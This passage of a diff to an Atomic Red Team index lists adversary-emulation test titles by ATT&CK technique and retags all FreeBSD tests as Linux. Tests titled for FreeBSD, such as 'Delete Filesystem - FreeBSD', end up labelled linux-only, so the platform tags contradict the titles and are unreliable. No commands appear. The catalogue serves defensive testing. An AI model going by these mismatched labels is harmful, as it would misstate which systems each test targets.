- - Atomic Test #6: Base64 decoding with shell utilities (freebsd) [freebsd]
- - Atomic Test #7: FreeBSD b64encode Shebang in CLI [freebsd]
- - Atomic Test #8: Hex decoding with shell utilities [freebsd, linux, macos]
+ - Atomic Test #6: Base64 decoding with shell utilities (freebsd) [linux]
+ - Atomic Test #7: FreeBSD b64encode Shebang in CLI [linux]
+ - Atomic Test #8: Hex decoding with shell utilities [linux, macos]
 - Atomic Test #9: Linux Base64 Encoded Shebang in CLI [linux, macos]
 - Atomic Test #10: XOR decoding and command execution using Python [linux, macos]
 - [T1562 Impair Defenses](../../T1562/T1562.md)
@@ -256,10 +256,10 @@
 - Atomic Test #14: Provlaunch.exe Executes Arbitrary Command via Registry Key [windows]
 - T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
- - Atomic Test #1: Set a file's access timestamp [freebsd, linux, macos]
- - Atomic Test #2: Set a file's modification timestamp [freebsd, linux, macos]
- - Atomic Test #3: Set a file's creation timestamp [freebsd, linux, macos]
- - Atomic Test #4: Modify file timestamps using reference file [freebsd, linux, macos]
+ - Atomic Test #1: Set a file's access timestamp [linux, macos]
+ - Atomic Test #2: Set a file's modification timestamp [linux, macos]
+ - Atomic Test #3: Set a file's creation timestamp [linux, macos]
+ - Atomic Test #4: Modify file timestamps using reference file [linux, macos]
 - Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
 - Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
 - Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
@@ -292,11 +292,11 @@
 - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
 - Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
 - Atomic Test #7: Stop/Start UFW firewall [linux]
- - Atomic Test #8: Stop/Start Packet Filter [freebsd]
+ - Atomic Test #8: Stop/Start Packet Filter [linux]
 - Atomic Test #9: Stop/Start UFW firewall systemctl [linux]
 - Atomic Test #10: Turn off UFW logging [linux]
 - Atomic Test #11: Add and delete UFW firewall rules [linux]
- - Atomic Test #12: Add and delete Packet Filter rules [freebsd]
+ - Atomic Test #12: Add and delete Packet Filter rules [linux]
 - Atomic Test #13: Edit UFW firewall user.rules file [linux]
 - Atomic Test #14: Edit UFW firewall ufw.conf file [linux]
 - Atomic Test #15: Edit UFW firewall sysctl.conf file [linux]
@@ -381,8 +381,8 @@
 - Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
 - T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
- - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [freebsd, macos, linux]
- - Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [freebsd, macos, linux]
+ - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [linux, macos]
+ - Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [linux, macos]
 - [T1484.001 Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md)
 - Atomic Test #1: LockBit Black - Modify Group policy settings -cmd [windows]
 - Atomic Test #2: LockBit Black - Modify Group policy settings -Powershell [windows]
@@ -407,15 +407,15 @@
 - Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
 - [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
 - Atomic Test #1: Make and modify binary from C source [macos, linux]
- - Atomic Test #2: Make and modify binary from C source (freebsd) [freebsd]
+ - Atomic Test #2: Make and modify binary from C source (freebsd) [linux]
 - Atomic Test #3: Set a SetUID flag on file [macos, linux]
- - Atomic Test #4: Set a SetUID flag on file (freebsd) [freebsd]
+ - Atomic Test #4: Set a SetUID flag on file (freebsd) [linux]
 - Atomic Test #5: Set a SetGID flag on file [macos, linux]
- - Atomic Test #6: Set a SetGID flag on file (freebsd) [freebsd]
+ - Atomic Test #6: Set a SetGID flag on file (freebsd) [linux]
 - Atomic Test #7: Make and modify capabilities of a binary [linux]
 - Atomic Test #8: Provide the SetUID capability to a file [linux]
- - Atomic Test #9: Do reconnaissance for files that have the setuid bit set [freebsd, linux]
- - Atomic Test #10: Do reconnaissance for files that have the setgid bit set [freebsd, linux]
+ - Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux]
+ - Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux]
 - T1117 Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1054 Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -430,9 +430,9 @@
 - T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.006 Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md)
 - Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
- - Atomic Test #2: Auditing Configuration Changes on FreeBSD Host [freebsd]
+ - Atomic Test #2: Auditing Configuration Changes on FreeBSD Host [linux]
 - Atomic Test #3: Logging Configuration Changes on Linux Host [linux]
- - Atomic Test #4: Logging Configuration Changes on FreeBSD Host [freebsd]
+ - Atomic Test #4: Logging Configuration Changes on FreeBSD Host [linux]
 - Atomic Test #5: Disable Powershell ETW Provider - Windows [windows]
 - Atomic Test #6: Disable .NET Event Tracing for Windows Via Registry (cmd) [windows]
 - Atomic Test #7: Disable .NET Event Tracing for Windows Via Registry (powershell) [windows]
@@ -497,14 +497,14 @@
 - T1196 Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
 - Atomic Test #1: Disable history collection [linux, macos]
- - Atomic Test #2: Disable history collection (freebsd) [freebsd]
+ - Atomic Test #2: Disable history collection (freebsd) [linux]
 - Atomic Test #3: Mac HISTCONTROL [macos, linux]
 - Atomic Test #4: Clear bash history [linux]
 - Atomic Test #5: Setting the HISTCONTROL environment variable [linux]
 - Atomic Test #6: Setting the HISTFILESIZE environment variable [linux]
- - Atomic Test #7: Setting the HISTSIZE environment variable [freebsd]
+ - Atomic Test #7: Setting the HISTSIZE environment variable [linux]
 - Atomic Test #8: Setting the HISTFILE environment variable [linux]
- - Atomic Test #9: Setting the HISTFILE environment variable (freebsd) [freebsd]
+ - Atomic Test #9: Setting the HISTFILE environment variable (freebsd) [linux]
 - Atomic Test #10: Setting the HISTIGNORE environment variable [linux]
 - T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -539,7 +539,7 @@
 - Atomic Test #5: Remove Administrative Shares [windows]
 - [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
 - Atomic Test #1: Disable syslog [linux]
- - Atomic Test #2: Disable syslog (freebsd) [freebsd]
+ - Atomic Test #2: Disable syslog (freebsd) [linux]
 - Atomic Test #3: Disable Cb Response [linux]
 - Atomic Test #4: Disable SELinux [linux]
 - Atomic Test #5: Stop Crowdstrike Falcon on Linux [linux]
@@ -580,7 +580,7 @@
 - Atomic Test #40: Suspend History [linux]
 - Atomic Test #41: Reboot Linux Host via Kernel System Request [linux]
 - Atomic Test #42: Clear Pagging Cache [linux]
- - Atomic Test #43: Disable Memory Swap [freebsd, linux]
+ - Atomic Test #43: Disable Memory Swap [linux]
 - Atomic Test #44: Disable Hypervisor-Enforced Code Integrity (HVCI) [windows]
 - Atomic Test #45: AMSI Bypass - Override AMSI via COM [windows]
 - Atomic Test #46: AWS - GuardDuty Suspension or Deletion [iaas:aws]
@@ -596,7 +596,7 @@
 - T1564.009 Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
 - Atomic Test #1: Decode base64 Data into Script [macos, linux]
- - Atomic Test #2: Decode base64 Data into Script [freebsd]
+ - Atomic Test #2: Decode base64 Data into Script [linux]
 - Atomic Test #3: Execute base64-encoded PowerShell [windows]
 - Atomic Test #4: Execute base64-encoded PowerShell from Windows Registry [windows]
 - Atomic Test #5: Execution from Compressed File [windows]
@@ -625,7 +625,7 @@
 - Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows]
 - [T1036.003 Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md)
 - Atomic Test #1: Masquerading as Windows LSASS process [windows]
- - Atomic Test #2: Masquerading as FreeBSD or Linux crond process. [freebsd, linux]
+ - Atomic Test #2: Masquerading as FreeBSD or Linux crond process. [linux]
 - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows]
 - Atomic Test #4: Masquerading - wscript.exe running as svchost.exe [windows]
 - Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe [windows]
@@ -646,7 +646,7 @@
 - T1506 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
 - Atomic Test #1: Install root CA on CentOS/RHEL [linux]
- - Atomic Test #2: Install root CA on FreeBSD [freebsd]
+ - Atomic Test #2: Install root CA on FreeBSD [linux]
 - Atomic Test #3: Install root CA on Debian/Ubuntu [linux]
 - Atomic Test #4: Install root CA on macOS [macos]
 - Atomic Test #5: Install root CA on Windows [windows]
@@ -655,9 +655,9 @@
 - [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
 - Atomic Test #1: Compile After Delivery using csc.exe [windows]
 - Atomic Test #2: Dynamic C# Compile [windows]
- - Atomic Test #3: C compile [freebsd, linux, macos]
- - Atomic Test #4: CC compile [freebsd, linux, macos]
- - Atomic Test #5: Go compile [freebsd, linux, macos]
+ - Atomic Test #3: C compile [linux, macos]
+ - Atomic Test #4: CC compile [linux, macos]
+ - Atomic Test #5: Go compile [linux, macos]
 - T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1197 BITS Jobs](../../T1197/T1197.md)
 - Atomic Test #1: Bitsadmin Download (cmd) [windows]
@@ -697,15 +697,15 @@
 - T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- - Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [freebsd, linux, macos]
- - Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [freebsd, linux, macos]
+ - Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [linux, macos]
+ - Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos]
 - Atomic Test #3: Overwrite and delete a file with shred [linux]
 - Atomic Test #4: Delete a single file - Windows cmd [windows]
 - Atomic Test #5: Delete an entire folder - Windows cmd [windows]
 - Atomic Test #6: Delete a single file - Windows PowerShell [windows]
 - Atomic Test #7: Delete an entire folder - Windows PowerShell [windows]
 - Atomic Test #8: Delete Filesystem - Linux [linux]
- - Atomic Test #9: Delete Filesystem - FreeBSD [freebsd]
+ - Atomic Test #9: Delete Filesystem - FreeBSD [linux]
 - Atomic Test #10: Delete Prefetch File [windows]
 - Atomic Test #11: Delete TeamViewer Log Files [windows]
 - T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -724,7 +724,7 @@
 - [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md)
 - Atomic Test #1: Space After Filename (Manual) [macos]
 - Atomic Test #2: Space After Filename [macos, linux]
- - Atomic Test #3: Space After Filename (FreeBSD) [freebsd]
+ - Atomic Test #3: Space After Filename (FreeBSD) [linux]
 - [T1550.002 Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md)
 - Atomic Test #1: Mimikatz Pass the Hash [windows]
 - Atomic Test #2: crackmapexec Pass the Hash [windows]
@@ -743,7 +743,7 @@
 - Atomic Test #3: WMIC bypass using local XSL file [windows]
 - Atomic Test #4: WMIC bypass using remote XSL file [windows]
 - [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- - Atomic Test #1: Create a hidden file in a hidden directory [freebsd, linux, macos]
+ - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
 - Atomic Test #2: Mac Hidden file [macos]
 - Atomic Test #3: Create Windows System File with Attrib [windows]
 - Atomic Test #4: Create Windows Hidden File with Attrib [windows]
@@ -787,11 +787,11 @@
 - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
 - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - Atomic Test #8: Create local account (Linux) [linux]
- - Atomic Test #9: Create local account (FreeBSD) [freebsd]
+ - Atomic Test #9: Create local account (FreeBSD) [linux]
 - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
- - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [freebsd]
+ - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
 - Atomic Test #12: Login as nobody (Linux) [linux]
- - Atomic Test #13: Login as nobody (freebsd) [freebsd]
+ - Atomic Test #13: Login as nobody (freebsd) [linux]
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
 - Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
@@ -855,11 +855,11 @@ - Atomic Test #24: Disable UAC - Switch to the secure desktop when prompting for elevation via registry key [windows] - [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) - Atomic Test #1: Sudo usage [macos, linux] - - Atomic Test #2: Sudo usage (freebsd) [freebsd] + - Atomic Test #2: Sudo usage (freebsd) [linux] - Atomic Test #3: Unlimited sudo cache timeout [macos, linux] - - Atomic Test #4: Unlimited sudo cache timeout (freebsd) [freebsd] + - Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux] - Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux] - - Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [freebsd] + - Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux] - [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) - Atomic Test #1: Service Registry Permissions Weakness [windows] - Atomic Test #2: Service ImagePath Change with reg.exe [windows] @@ -881,9 +881,9 @@ - Atomic Test #4: TinyTurla backdoor service w64time [windows] - Atomic Test #5: Remote Service Installation CMD [windows] - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - - Atomic Test #3: Cron - Add script to /etc/cron.d folder [freebsd] + - Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux] - Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1547.012 Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) 
@@ -938,9 +938,9 @@ - T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) - Atomic Test #1: Trap EXIT [macos, linux] - - Atomic Test #2: Trap EXIT (freebsd) [freebsd] + - Atomic Test #2: Trap EXIT (freebsd) [linux] - Atomic Test #3: Trap SIGINT [macos, linux] - - Atomic Test #4: Trap SIGINT (freebsd) [freebsd] + - Atomic Test #4: Trap SIGINT (freebsd) [linux] - [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] 
@@ -954,15 +954,15 @@ - Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows] - [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) - Atomic Test #1: Make and modify binary from C source [macos, linux] - - Atomic Test #2: Make and modify binary from C source (freebsd) [freebsd] + - Atomic Test #2: Make and modify binary from C source (freebsd) [linux] - Atomic Test #3: Set a SetUID flag on file [macos, linux] - - Atomic Test #4: Set a SetUID flag on file (freebsd) [freebsd] + - Atomic Test #4: Set a SetUID flag on file (freebsd) [linux] - Atomic Test #5: Set a SetGID flag on file [macos, linux] - - Atomic Test #6: Set a SetGID flag on file (freebsd) [freebsd] + - Atomic Test #6: Set a SetGID flag on file (freebsd) [linux] - Atomic Test #7: Make and modify capabilities of a binary [linux] - Atomic Test #8: Provide the SetUID capability to a file [linux] - - Atomic Test #9: Do reconnaissance for files that have the setuid bit set [freebsd, linux] - - Atomic Test #10: Do reconnaissance for files that have the setgid bit set [freebsd, linux] + - Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux] + - Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux] - [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] 
@@ -1059,9 +1059,9 @@ - [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) - Atomic Test #1: Add command to .bash_profile [macos, linux] - Atomic Test #2: Add command to .bashrc [macos, linux] - - Atomic Test #3: Add command to .shrc [freebsd] - - Atomic Test #4: Append to the system shell profile [freebsd, linux] - - Atomic Test #5: Append commands user shell profile [freebsd, linux] + - Atomic Test #3: Add command to .shrc [linux] + - Atomic Test #4: Append to the system shell profile [linux] + - Atomic Test #5: Append commands user shell profile [linux] - Atomic Test #6: System shell profile scripts [linux] - Atomic Test #7: Create/Append to .bash_logout [linux] - [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) @@ -1098,11 +1098,11 @@ - Atomic Test #1: rc.common [macos] - Atomic Test #2: rc.common [linux] - Atomic Test #3: rc.local [linux] - - Atomic Test #4: rc.local (FreeBSD) [freebsd] + - Atomic Test #4: rc.local (FreeBSD) [linux] - T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) - Atomic Test #1: Create Systemd Service [linux] - - Atomic Test #2: Create SysV Service [freebsd] + - Atomic Test #2: Create SysV Service [linux] - Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux] - T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -1128,7 +1128,7 @@ - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md) - Atomic Test #1: At.exe Scheduled task [windows] - Atomic Test #2: At - Schedule a job [linux] - - Atomic Test #3: At - Schedule a job freebsd [freebsd] + - Atomic Test #3: At - Schedule a job freebsd [linux] - [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] - Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows] @@ -1144,11 +1144,11 @@ - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows] - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows] - Atomic Test #8: Create local account (Linux) [linux] - - Atomic Test #9: Create local account (FreeBSD) [freebsd] + - Atomic Test #9: Create local account (FreeBSD) [linux] - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux] - - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [freebsd] + - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux] - Atomic Test #12: Login as nobody (Linux) [linux] - - Atomic Test #13: Login as nobody (freebsd) [freebsd] + - Atomic Test #13: Login as nobody (freebsd) [linux] - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) - Atomic Test #1: User scope COR_PROFILER [windows] - Atomic Test #2: System Scope COR_PROFILER [windows] 
@@ -1201,9 +1201,9 @@ - Atomic Test #10: LNK Payload Download [windows] - Atomic Test #11: Mirror Blast Emulation [windows] - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - - Atomic Test #3: Cron - Add script to /etc/cron.d folder [freebsd] + - Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux] - Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -1271,22 +1271,22 @@ - Atomic Test #3: Create a system level transient systemd service and timer [linux] - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) - - Atomic Test #1: Create and Execute Bash Shell Script [freebsd, linux, macos] - - Atomic Test #2: Command-Line Interface [freebsd, linux, macos] + - Atomic Test #1: Create and Execute Bash Shell Script [linux, macos] + - Atomic Test #2: Command-Line Interface [linux, macos] - Atomic Test #3: Harvest SUID executable files [linux] - Atomic Test #4: LinEnum tool execution [linux] - - Atomic Test #5: New script file in the tmp directory [freebsd, linux] - - Atomic Test #6: What shell is running [freebsd, linux] - - Atomic Test #7: What shells are available [freebsd, linux] - - Atomic Test #8: Command line scripts [freebsd, linux] + - Atomic Test #5: New script file in the tmp directory [linux] + - Atomic Test #6: What shell is running [linux] + - Atomic Test #7: What shells are available [linux] + - Atomic Test #8: Command line scripts [linux] - Atomic Test #9: Obfuscated command line scripts [linux] - - Atomic Test #10: Obfuscated command line scripts (freebsd) [freebsd] + - Atomic Test #10: Obfuscated command line scripts (freebsd) [linux] - Atomic Test #11: Change login shell [linux] - - Atomic Test #12: Change login shell (freebsd) [freebsd] + - Atomic Test #12: Change login shell (freebsd) [linux] - Atomic Test #13: Environment variable scripts [linux] - - Atomic Test #14: Environment variable scripts (freebsd) [freebsd] + - Atomic Test #14: Environment variable scripts (freebsd) [linux] - Atomic Test #15: Detecting pipe-to-shell [linux] - - Atomic Test #16: Detecting pipe-to-shell (freebsd) [freebsd] + - Atomic Test #16: Detecting pipe-to-shell (freebsd) [linux] - Atomic Test #17: Current kernel information enumeration [linux] - [T1559 Inter-Process 
Communication](../../T1559/T1559.md) - Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows] @@ -1301,10 +1301,10 @@ - T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1059.006 Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) - - Atomic Test #1: Execute shell script via python's command mode arguement [freebsd, linux] - - Atomic Test #2: Execute Python via scripts [freebsd, linux] - - Atomic Test #3: Execute Python via Python executables [freebsd, linux] - - Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [freebsd, linux] + - Atomic Test #1: Execute shell script via python's command mode arguement [linux] + - Atomic Test #2: Execute Python via scripts [linux] + - Atomic Test #3: Execute Python via Python executables [linux] + - Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [linux] - T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1059.003 Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) - Atomic Test #1: Create and Execute Batch Script [windows] @@ -1333,7 +1333,7 @@ - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md) - Atomic Test #1: At.exe Scheduled task [windows] - Atomic Test #2: At - Schedule a job [linux] - - Atomic Test #3: At - Schedule a job freebsd [freebsd] + - Atomic Test #3: At - Schedule a job freebsd [linux] - T1035 Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1086 PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1118 InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -1357,7 +1357,7 @@ - T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) - Atomic Test #1: Malicious PAM rule [linux] - - Atomic Test #2: Malicious PAM rule (freebsd) [freebsd] + - Atomic Test #2: Malicious PAM rule (freebsd) [linux] - Atomic Test #3: Malicious PAM module [linux] - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -1394,9 +1394,9 @@ - Atomic Test #4: TinyTurla backdoor service w64time [windows] - Atomic Test #5: Remote Service Installation CMD [windows] - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - - Atomic Test #3: Cron - Add script to /etc/cron.d folder [freebsd] + - Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux] - Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1137 Office Application Startup](../../T1137/T1137.md) 
@@ -1425,9 +1425,9 @@ - Atomic Test #1: Simulate Patching termsrv.dll [windows] - Atomic Test #2: Modify Terminal Services DLL Path [windows] - [T1176 Browser Extensions](../../T1176/T1176.md) - - Atomic Test #1: Chrome/Chromium (Developer Mode) [freebsd, linux, windows, macos] - - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [freebsd, linux, windows, macos] - - Atomic Test #3: Firefox [freebsd, linux, windows, macos] + - Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos] + - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos] + - Atomic Test #3: Firefox [linux, windows, macos] - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos] - Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows] - T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -1473,21 +1473,21 @@ - T1031 Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) - Atomic Test #1: Trap EXIT [macos, linux] - - Atomic Test #2: Trap EXIT (freebsd) [freebsd] + - Atomic Test #2: Trap EXIT (freebsd) [linux] - Atomic Test #3: Trap SIGINT [macos, linux] - - Atomic Test #4: Trap SIGINT (freebsd) [freebsd] + - Atomic Test #4: Trap SIGINT (freebsd) [linux] - [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] - Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos] - [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md) - Atomic Test #1: Create a user account on a Linux system [linux] - - Atomic Test #2: Create a user account on a FreeBSD system [freebsd] + - Atomic Test #2: Create a user account on a FreeBSD system [linux] - Atomic Test #3: Create a user account on a MacOS system [macos] - Atomic Test #4: Create a new user in a command prompt [windows] - Atomic Test #5: Create a new user in PowerShell [windows] - Atomic Test #6: Create a new user in Linux with `root` UID and GID. [linux] - - Atomic Test #7: Create a new user in FreeBSD with `root` GID. [freebsd] + - Atomic Test #7: Create a new user in FreeBSD with `root` GID. [linux] - Atomic Test 